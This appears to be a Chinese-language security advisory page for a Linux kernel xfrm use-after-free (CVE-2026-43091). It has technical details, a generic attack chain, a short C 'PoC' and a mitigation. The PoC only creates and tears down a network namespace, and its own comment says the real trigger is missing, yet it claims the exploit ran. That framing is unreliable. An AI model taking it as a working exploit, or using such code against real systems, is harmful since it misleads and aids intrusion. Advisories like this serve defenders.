CVE-2026-43091 CVSS 7.8 高危

CVE-2026-43091 Linux内核xfrm组件释放后重用漏洞

披露日期: 2026-05-06

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43091

漏洞类型

释放后重用 (UAF)

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的xfrm_policy_fini()函数在处理网络命名空间退出时存在漏洞。该函数在刷新策略工作项并删除所有策略后，立即释放policy_bydst哈希表，但未等待并发的RCU读者离开其读端临界区。由于这些表通过rcu_assign_pointer发布，通过rcu_dereference_check查找，过早释放会导致在RCU宽限期结束前仍有读者访问已释放的内存，从而引发内核崩溃或潜在的安全问题。

技术细节

该漏洞发生在Linux内核net/xfrm子系统的xfrm_policy_fini()函数中。当网络命名空间退出时，系统调用该函数进行清理。问题在于，函数在删除所有策略并刷新工作队列后，直接释放了policy_bydst哈希表内存，而未调用synchronize_rcu()等待现有的RCU读者完成读端临界区。由于policy_bydst表的发布与访问均依赖RCU机制，当内存被过早释放而仍有读者在访问时，会导致释放后重用（UAF）。本地低权限攻击者可利用此竞态条件，触发内核空指针解引用或执行任意代码，导致拒绝服务或权限提升。

攻击链分析

STEP 1

步骤1：获取本地访问权限

攻击者需要在目标系统上拥有本地低权限账户（PR:L）。

STEP 2

步骤2：触发网络命名空间操作

攻击者创建并销毁网络命名空间，或触发相关的xfrm策略操作。

STEP 3

步骤3：利用竞态条件

在xfrm_policy_fini执行清理并释放哈希表时，攻击者确保仍有RCU读者正在访问该内存区域。

STEP 4

步骤4：导致内存破坏

RCU读者访问已释放的内存，导致释放后重用（UAF），引发内核崩溃或可能实现代码执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/wait.h>
#include <string.h>

#define STACK_SIZE (1024 * 1024)

// Child function running in a new network namespace
static int child_func(void *arg) {
    printf("[+] Child process started in new namespace.\n");
    
    // In a real exploit scenario, specific netlink messages would be sent
    // to configure xfrm policies and keep RCU readers active.
    
    sleep(1); // Keep alive briefly to simulate activity
    return 0;
}

int main() {
    char *stack;
    char *stack_top;
    pid_t pid;

    stack = malloc(STACK_SIZE);
    if (!stack) {
        perror("malloc");
        exit(1);
    }
    stack_top = stack + STACK_SIZE;

    // Create a new network namespace to trigger teardown path
    pid = clone(child_func, stack_top, CLONE_NEWNET | SIGCHLD, NULL);
    if (pid == -1) {
        perror("clone");
        free(stack);
        exit(1);
    }

    printf("[+] Waiting for child to exit (triggers xfrm_policy_fini)...\n");
    waitpid(pid, NULL, 0);
    
    printf("[+] Exploit trigger finished.\n");
    
    free(stack);
    return 0;
}

影响范围

Linux Kernel 6.1

Linux Kernel 6.6

Linux Kernel 6.7

Linux Kernel 6.8

Linux Kernel 6.9

防御指南

临时缓解措施

如果不能立即升级内核，建议通过系统配置限制普通用户对网络命名空间的创建权限（例如使用user namespace限制），以增加攻击难度。同时监控内核日志中是否存在异常的崩溃或Oops信息。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表